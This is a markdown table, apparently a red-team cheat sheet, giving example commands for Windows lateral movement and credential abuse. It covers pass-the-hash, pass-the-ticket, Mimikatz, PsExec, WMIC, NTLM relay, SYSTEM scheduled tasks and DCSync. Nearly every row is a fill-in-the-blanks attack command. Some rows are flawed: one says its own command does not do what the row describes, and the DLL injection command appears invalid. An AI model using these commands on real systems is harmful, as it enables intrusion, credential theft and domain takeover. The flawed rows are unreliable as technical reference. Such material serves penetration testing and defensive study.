| Technique | Description | Example command |
|---|---|---|
| Pass-the-Hash (PtH) | Using an extracted NTLM hash to authenticate as a user without needing their plaintext password. | `pth-winexe -U <domain>/<user>%<hash> //<target_ip> cmd` |
| Pass-the-Ticket (PtT) | Using a stolen Kerberos ticket to authenticate as a user. | `Invoke-Mimikatz -Command '"kerberos::ptt <ticket>"'` |
| Over-Pass-the-Hash (Pass-the-Key) | Using an NTLM hash (or, for Pass-the-Key, the account's AES key) to request a Kerberos ticket for authentication. | `mimikatz.exe "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /aes256:<aes256_key>"` |
| Remote Services (PsExec, WMI, WinRM) | Executing commands on remote systems using tools like PsExec, WMI, or WinRM. | `psexec.exe \\<target_ip> -u <user> -p <password> cmd` |
| Remote Desktop Protocol (RDP) | Connecting to a remote system's desktop to control it as if locally logged in. | `mstsc /v:<target_ip>` |
| WMIC (Windows Management Instrumentation Command-line) | Using WMI to execute commands on remote systems. | `wmic /node:<target_ip> process call create "cmd.exe"` |
| Windows Remote Management (WinRM) | Using the WinRM service to execute commands or scripts on a remote machine. | `evil-winrm -i <target_ip> -u <user> -H <hash>` |
| SMB (Server Message Block) Relay | Relaying a captured SMB authentication attempt to another host in order to execute commands there. | `ntlmrelayx.py -t smb://<target_ip>` |
| DCOM (Distributed Component Object Model) | Using DCOM objects to execute commands on remote systems. | `dcomexec.py <domain>/<user>:<password>@<target_ip>` |
| PowerShell Remoting | Executing PowerShell commands on remote systems using remoting features. | `Enter-PSSession -ComputerName <target_ip> -Credential <user>` |
| Scheduled Tasks | Creating or modifying scheduled tasks on a remote system to execute code with elevated privileges. | `schtasks /create /tn "TaskName" /tr "C:\malicious.exe" /sc onstart /ru SYSTEM /S <target_ip>` |
| WMI Event Subscription | Creating WMI event subscriptions to persist code execution on a remote system. Note that the command shown only starts a process through the `Win32_Process` class; it does not register an event subscription. | `Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "C:\malicious.exe" -ComputerName <target_ip>` |
| Lateral Tool Transfer | Moving tools or scripts to remote systems to facilitate further exploitation. | `copy C:\tool.exe \\<target_ip>\C$\Windows\Temp\` |
| DLL Injection | Injecting malicious code into the memory of a running process on a remote system. | `mimikatz.exe "privilege::debug" "inject::process" "C:\malicious.dll"` |
| Active Directory Replication | Using the Directory Replication Service (DRS) to replicate AD data (DCSync) and move laterally within the domain. | `Invoke-Mimikatz -Command '"lsadump::dcsync /user:<user>"'` |